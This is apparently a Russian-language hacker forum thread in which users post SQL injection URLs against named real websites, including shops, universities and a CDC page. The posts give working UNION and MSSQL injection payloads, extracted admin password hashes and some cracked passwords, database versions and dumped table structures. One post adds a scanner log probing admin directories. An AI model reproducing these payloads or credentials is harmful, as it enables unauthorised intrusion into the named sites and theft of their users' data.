вот так тож можно http://www.horsens-emballage.dk/products.php?id=121+union+select%201,password,3,4,5+from+users ------------------------------------------------------------------ admin:6acb8c143d32f46326b37aa2fff1bced
сайт посвящённый программированию: знаменитый ИСХОДНИКИ.РУ admin:d2811372903d0e598162e5762cd18340db68d846 -> flash15 а вот админку так и не нашёл =(
в антибояне нет www.kulturflooring.com Уязвимость в скрипте: Code: http://www.kulturflooring.com/index.php?id=1' Подбор колонок: Code: http://www.kulturflooring.com/index.php?id=-1+union+select+1,2,3,4/* Информация о базе: Code: 4.0.26 kulturflooring_com [email protected]
http://o-sport.ru/ 5.0.30-Debian_1-log Вытащил все че мог я) admin:508504343ef23ff48724729cd07281e7 =>290486 Если база с хэшей не врет. Админку не нашел если кто найдет Дайте знать где она.
http://www.protopor.gr/index.php?shownews=-1/**/union/**/select/**/0,1,2,3,4,5,concat(uid,char(20),username,char(20),password),7,8,version(),10,user(),12,13,14,15,16,17+from+users/*
http://www.party-san.de/openair/festival/index.php?shownews=-1'/**/union/**/select/**/0,concat(id,char(20),username,char(20),pwd,ch ar(20),email),2,concat(version(),char(20),database(),char(20),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+pnew s_pfuser/*&lang=de
sql mssql http://www.gastromag.ru/newsgastro/view_archive.asp?r=6&id=-1'+or+1=@@version%20-- Вытащил имена таблиц, и уже столбцы. ('column') Буду осматривать все((( так как бональнова ,user,password нету( Име базы текущего usera: 'GSnews' Может админка не в этой базе? А может что login и pass вобще не хранится в mssql, или нету прав на просмотр имени этой таблице?
Code: http://spa.american.edu/ccps/pages.php?ID=-20+union+select+1,2,3/* Code: http://www2a.cdc.gov/phlp/dailynews/default.asp?specific=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('PHLP_tblBibPub','PHLP_tblBib','CoopAgree_Projects','EPRP_PRGrants','EPRP_TBLGLOBAL','invTBLCDOrder','EPRP_TBLLOGINS','invTBLCONTACT','Campus','CoopAgree_Award','CoopAgree_ContactProject','CoopAgree_ContactReviewerPanel','CoopAgree_Contacts','CoopAgree_ContactSAE','CoopAgree_Institution','CoopAgree_InstitutionOLD','CoopAgree_PanelContact','CoopAgree_Pep','CoopAgree_PepContact','CoopAgree_ProjectSAE','CoopAgree_PrtControl','CoopAgree_PrtControlParms','CoopAgree_ReviewerPanel','CoopAgree_ReviewerPanel','CoopAgree_Role','CoopAgree_SAE','CoopAgree_Security','DPHSDRTask_Clearance','DPHSDRTask_Divisions','DPHSDRTask_Meeting','DPHSDRTask_POC','DPHSDRTask_Projects','DPHSDRTask_ProjectStatus','DPHSDRTask_ProjectTypes','dtproperties','eprpTBLCONTACT','HelpDeskAdmins','ITSO_VC_SURVEY','JohnNews','LPHPRCI_UserListing','LU_Branch','LU_Division','LU_EmailGroup','LU_Request','MGMT_Developers','MGMT_Divisions','MGMT_Projects','MGMT_ProjectStatus','MGMT_ProjectTypes','OD_TBLLOGINS','ODTASK_Clearance','ODTask_Divisions','ODTASK_Meeting','ODTask_POC'))-- Code: http://pr.utk.edu/news/article.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('HS_TRANSACTION_LOG','dtproperties','RELEASE_UTC','releaseTBL','sysconstraints','syssegments','tntnews','vw_Release','vwDROP','vwDROP2','vwEXPIRE','vwEXPIREDATE','vwTODAY','vwUTM','vwVET','vwWeek'))-- Code: http://idl63.ils.unc.edu/chirag/Energy/showmetadata.php?video_id=-8949+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+42,1/* Code: http://www.fwbusinesspress.com/display.php?id=-6716+union+select+1+from+admin/* Code: 
http://www.graysofwestminster.co.uk/newsitem.php?id=-35+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6/* Code: http://www.stjerome.co.uk/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*&doctype=Periodicals§ion=1 Code: http://www.pluralism.org/news/article.php?id=-2557+union+select+1,user(),3,4,5,6,7,8,9,10,version(),database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* Code: http://www.dysgenicrecords.com/release.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,10,11/* Code: http://www.coopersurgical.com/csweb/product_100.asp?category_id=1%20or%201=(SELECT+TOP+1+last_name+FROM+csweb_user)-- имеется колонки: 'user_id','customer_number','unvalidated_customer_number','date_created','first_name','middle_initial','last_name','title','telephone_number','fax_number','email_address','password','marketing_info_id','email_reminder Code: http://www.peakdistrictonline.co.uk/content.php?categoryId=1804+order+by+100/* Code: http://www.tartybikes.co.uk/product.php?id=-10008+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,table_name,20,21+from+information_schema.tables+limit+47,1/* Code: http://www.magic-pony.com/product.php?id=-2384+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*&category=western Code: http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)%2B%27%3A%27%2Bcast(email+as+nvarchar)+from+Customersreal+where+CustomerID=150)-- Code: http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as++nvarchar)+from+users)-- carl:wrex Code: 
http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('hayleybookings','CancelShop2008a','hayleycharges','beachinfotest','ModCottages2009','ModCottages2008new','ModCottages2008a','cartitem','BookingNew2001','ModCottages','ModBooking2009','coastal_offers','Clusters','ModBooking2008new','ClusterCottages','monthof','BookingNew2006a','ClientCare2009','OwnerNew','BookingNew2007','ModBooking2008a','OwnerNew2001','BookingNew2007old','users','ClientCare2008a','OwnerNew2002','BookingNew2008','CancelBooking2008a','ClientCare2007','OwnerNew2003','BookingNew2008a','clent_care','OwnerNew2004','ModBooking2007','OwnerNew2005','BookingNew2009','sin','location','OwnerNew2006','CCPHomePage','CottageMaint2009','CottageMaint2008a','CottageMaint2007','OwnerNew2007old','CancelBooking2009','Customersreal','emailreport','guestbook','emailcontent','CottagesNew2008new','ecards','dogs','D99_Tmp','OwnerNew2009','Caretaker2007','picofmonth','Caretaker2007a','customers','PricesNew2007','Caretaker2007b','PricesNew2008a','LateDeals','Caretaker2008','Caretaker2008a','PricesNew2009','Caretaker2008b','CancelBooking2008new','Pricing2000','Caretaker2009','Pricing2001','Caretaker2009a','Pricing2002','Caretaker2009b','pricing2003','pricing2004','celebrations','pricing2005','Charges','pricing2006','Charges2001','pricing2006a'))--&category=9 Code: http://www.magicbeard.com/view.php?id=-35'+union+select+1,2,3,4,5,6,7,8,9/* Code: http://www.cz-usa.com/product_detail.php?id=-74+union+select+1,2,3,4,5,6/* Code: http://www.solarstyleinc.com/detail.php?ID=-64+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/* Code: http://edgartownboardoftrade.com/php/events2.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* Code: http://www.menupix.com/boulder/restaurants.php?id=-700105+union+select+1,2,3/* Code: 
http://www.airsideshop.com/product.php?id=-298+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,14,14,14,14,14,14/* Code: http://www.pharmaexpress.us/resource/products/orderInfoForm.asp?ID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('TABLE_PRIVILEGES','TABLES','SCHEMATA','OrderSearchedWords','KNUEPPELS_Reorder','surfmedproducts','OrderProductsCOPY','Careers','Sheet1$','OrderCustomers','tblPolls','ArticleTypes','tblConfiguration','lifeplus','lifplusCLEAN','MotionWhatsNew','MotionNews','MotionLogin','OrderInsuranceApp','MalEmails','OrderMfgs','OrderProducts','Audit','ArticleCategories','StateNames','OrderReceipts','ArticleUploads','OrderOwnerProducts','OrderLIreorder','Deliveries','OrderCategory','OrderBasket','OrderOwners','AppointmentRegistration','Aronson_Referral_Form','Articles','PollTakers','Polls','PollQuestions','REFERENTIAL_CONSTRAINTS','CHECK_CONSTRAINTS','UnityHME_news','CONSTRAINT_TABLE_USAGE','CONSTRAINT_COLUMN_USAGE','VIEWS','AEROFLOW_Forms','OrderProductsNEW','VIEW_TABLE_USAGE','VIEW_COLUMN_USAGE','GalleryTopics','ResFormLineItems','GalleryPhotos','syssegments','sysconstraints','sysalternates','ValidUsers','KEY_COLUMN_USAGE','ResFormCustomers','TankMasterTanks','TankEvacuation','OrderSubmitToLoc','dtproperties','TankAnalyzerCheck','!SiteOwners','TankAudit','TankLocation','TreeList_Tmp','TankValidUsers','OrderInfoRequests','TankDetails','ResFormProducts','TABLE_CONSTRAINTS','COLUMNS','COLUMN_DOMAIN_USAGE','LINCOLN_ReferralForm','COLUMN_PRIVILEGES','DOMAINS','DOMAIN_CONSTRAINTS','UnityHME_news_categories'))-- Code: http://dma.ucla.edu/gallery/faculty_gallery.php?ID=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* Code: http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Для кого пишут статьи? http://www.inattack.ru/article/275.html http://www.inattack.ru/article/163.html ... Поиск по форуму находится слева.
erostory.ru Порнуха в текстовом виде xD. Интересные запросы к интересным таблицам: Логиниться с этими данными в http://www.erostory.ru/autor.php . Как попасть в админку: хз. Просканил CGI-сканером Pelmeshko: Code: --------------------------------------------- [i] Starting scan. [i] Start time: Sat Jun 7 19:49:05 2008 [i] Targer host/path: erostory.ru/ [i] Targer port/SSL: 80 | 0 --------------------------------------------- [*] 404 Probe request to server. Server answering with HTTP/1.1 404 Not Found [*] Server Headers: [*] Server: Apache/2 [*] Database Cgi's: [*] Rootdir found: erostory.ru/cgi-bin/ [*] Database Common: [*] Rootdir found: erostory.ru/ [*] [403] Found: erostory.ru/admin/ [*] [403] Found: erostory.ru/administration/ [*] [403] Found: erostory.ru/admins/ [*] [403] Found: erostory.ru/cgi-bin/ [*] [302] Found: erostory.ru/config/ [*] [403] Found: erostory.ru/error/ [*] [403] Found: erostory.ru/images/ [*] [403] Found: erostory.ru/img/ [*] [403] Found: erostory.ru/picture/ [*] [200] Found: erostory.ru/robots.txt [*] [403] Found: erostory.ru/.htaccess [*] [403] Found: erostory.ru/.htpasswd [*] [403] Found: erostory.ru/.htaccess~ [*] [403] Found: erostory.ru/.htpasswd~ [*] [403] Found: erostory.ru/admin-a/ [*] [403] Found: erostory.ru/server-status/ --------------------------------------------- [*] Scan finished at Sat Jun 7 19:53:28 2008. Total 817 objects scanned --------------------------------------------- Куча админок, но все 403 Forbidden. Может админа по IP-адресу определяют, я хз...
http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,version(),3,4,user()/* version() 4.1.22 user() flirtani@localhost не стал подбирать колонки, не люблю 4-ую версию за это :-( ---------------------------------- http://www.webapplist.com/category.php?id=-1'+union+select+1,2,3,4/* а здесь не смог подобрать кол-во колонок, дошел до 100 но все равно: The used SELECT statements have a different number of columns посмотрите если кому интересно...
http://www.ittconference.ie Code: http://www.ittconference.ie/main.php?ID=-1+union+select+1,concat_ws(0x3a,username,password,email),3,4,5,6,7+from+itt_reviewer+limit+0,1/* http://www.curacaodolphintherapy.com/ Code: http://www.curacaodolphintherapy.com/main.php?id=-1+union+select+1,2,concat_ws(0x3a,id,username,password,admin),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+limit+0,1/*
http://www.eicta.org/index.php?id=32&id_article=93' http://www.paintball.ru/next.php?id=999919+union+select+1,2,VERSION() http://www.comingsoon.net/films.php?id=1+union+select+VERSION() http://www.fcdynamo.ru/players.php?id=-1'+union+select+table_name+from+information_schema.tables+limit+59,1/* http://expressorder.ru/forum/message.php?id=11' http://www.hpol.org/record.php?id=72 http://www.mymaika.ru/catalog.php?id=181' http://www.fm.gov.lv/index.php?id=8' http://www.mtas.ru/second.php?ID=-243+union+select+1/* http://opel.avto-city.ru/catalog.php?id=-3+union+select+1,2,3,4,5,6,7/* http://koleso.topof.ru/testing_info.php?id=-9+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name='admins'+limit+1,1/* http://koleso.topof.ru/testing_info.php?id=-9+union+select+1,2,concat(admin_name,0x3a,admin_password),4,5,6,7+from+admins+limit+5,1/* http://www.flirtanica.ru/articles1.php?id=-33+union+select+1,2,3,4,VERSION()/* http://www.rudtp.ru/articles.php?id=44+union+select+1,2,3,4,5,6,7/* http://www.acte.org/resources/press_release.php?id=-284+union+select+1,2,3,4,5,6,7,8,9/* http://www.analisi.ru/regulations.php?id=-3+union+select+1,2,3,4/* http://ansijournals.com/3/c4p.php?id=1'&theme=3&jid=itj http://www.bmoca.org/artist.php?id=-74+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* http://www.chinesejetpilot.com/index.php?ID=-202+union+select+1,2,3,4,5,6/* http://www.avtosreda.ru/new/meropr.php?id=-16+union+select+1/* http://zoorinok.com.ua/razdel/&podrazdel=-306+union+select+1,VERSION(),3,4,5,6/* =============================================================== lastsmile,я твою первую скулю давненько нашел,но ты оказался тут первым=)
www.glaad.org Уязвимость: Code: http://www.glaad.org/media/resource_kit_detail.php?id=3457' Колонки: Code: http://www.glaad.org/media/resource_kit_detail.php?id=-3457+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 Информация о базе: Code: glaad_www_1 4.0.12-standard glaad@localhost
www.suter.ru Сайт российских сутенеров VERSION() - 5.1.11-beta USER() - xstars_u@localhost DATABASE() - db_xstars_u Структура таблиц Code: ************************** agent -------------------------- name cvet ************************** attak -------------------------- ip k-vo interval adres site otprmail ************************** buf -------------------------- ip vrem adres site ************************** clicks -------------------------- ip banner_id time referer ************************** club -------------------------- name name_en opisanie opisanie_en photo link data block ************************** sessions -------------------------- uid expire ip ************************** sites -------------------------- site log posl poslstr id name ************************** users -------------------------- name email transfer phone site password ************************** devk -------------------------- new name name_en prioritet rate id_goroscop razmer rost ves grud vozrast id_gorod id_metro adres mail club text text_en hour_app hour2_app night_app hour_out hour2_out night_out sutki valut photosmall time_block data block prosmotr penis kto chya blockind ************************** dnevniky -------------------------- nazv smtext text links date ************************** foto -------------------------- id_devk foto ************************** gorod -------------------------- name name_en ************************** goroscop -------------------------- name name_en ************************** message -------------------------- r_id name subject msg email m_date ip ************************** message1 -------------------------- id_devk nick mess data ************************** message_en -------------------------- r_id name subject msg email m_date ip ************************** metro -------------------------- name name_en ************************** param -------------------------- mned ened kned pned transned ************************** podrugy -------------------------- 
podruga_id ************************** poll_alternatives -------------------------- alternative votes id ************************** polls -------------------------- question active dateactive votes ************************** polz -------------------------- login pass mail balance ************************** site_news -------------------------- nazv text date ************************** soedcp -------------------------- id_club ************************** soeddp -------------------------- id_devk ************************** suter_cras -------------------------- name block ************************** suter_crast -------------------------- id_cras nazv text date ************************** suter_lgesotr -------------------------- block name text foto1 foto2 foto3 gorod ip datetime ************************** suter_nazam -------------------------- name block ************************** suter_nazamt -------------------------- id_nazam nazv text date ************************** suter_psevdoklienty -------------------------- name ip mail telephone telephone2 mbtelephone mb2telephone name_ps adres avto soobsh date ************************** suter_rassilk -------------------------- mail ip date ************************** suter_urb -------------------------- name block ************************** suter_urbt -------------------------- id_urb nazv text date ************************** svaz_uslug -------------------------- id_usl ************************** telephone -------------------------- id_club operator ************************** telephoneind -------------------------- tel operator ************************** uslugy -------------------------- name name_en kto ************************** video -------------------------- id_devk namev data ************************** x_news -------------------------- nazv nazv_en smtext smtext_en text text_en img date **************************